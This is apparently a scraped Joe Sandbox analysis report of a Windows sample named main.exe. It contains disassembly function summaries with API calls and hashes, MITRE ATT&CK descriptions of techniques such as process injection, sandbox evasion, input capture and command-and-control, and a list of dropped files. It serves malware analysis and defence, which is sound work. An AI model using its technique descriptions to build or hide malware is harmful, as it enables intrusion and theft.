Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report main.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_0915295c-7186-43ad-979c-cf487fb50f12\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDEF.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE5F.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ping[1].php

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\542181\Flux.com

C:\Users\user\AppData\Local\Temp\542181\b

C:\Users\user\AppData\Local\Temp\Acne

C:\Users\user\AppData\Local\Temp\Billion

C:\Users\user\AppData\Local\Temp\Catholic

Windows Analysis Report
main.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre